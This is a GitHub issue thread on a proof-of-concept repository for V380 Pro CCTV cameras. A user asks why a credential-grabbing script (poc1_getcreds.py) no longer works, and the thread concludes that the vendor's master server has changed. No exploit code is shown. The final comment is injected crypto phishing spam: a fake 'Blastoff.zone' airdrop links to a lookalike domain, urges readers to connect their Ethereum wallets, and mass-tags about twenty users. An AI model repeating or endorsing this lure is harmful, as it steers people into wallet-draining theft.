### ISSUE TITLE
still works?

### ISSUE THREAD

**Issue by N0TKZ** [dunderhay/CCTV-v380-pro#6]
does this methods still works?  I tried poc1_getcreds.py both from wan and lan but nothing shows up in the terminal. it only says [*] Advertise a new camera on the network to master server with device ID: "my device id"

**Comment by dunderhay** [comment]
Unfortunately I don't have access to this camera anymore to test 🥲

**Comment by N0TKZ** [comment]
> Unfortunately I don't have access to this camera anymore to test 🥲

i did some research unfortunately the master server has changed :( the previous one no longer reachable

**Comment by bahramiholding** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
anaynayak, @lewislarsen, @Misterhex, @vamsiikrishna, @adityamenon, @mikehotel, @xinyuan-404, @sowish, @bekhzod-akhrorov-vas, @Adrian-Samuel, @Cr3aig, @phra, @FuckingHack3r, @antx-code, @ps-dfritzsch, @credo92, @anthonyg-1, @ziye0109, @ojaxvee, @shuvonsec
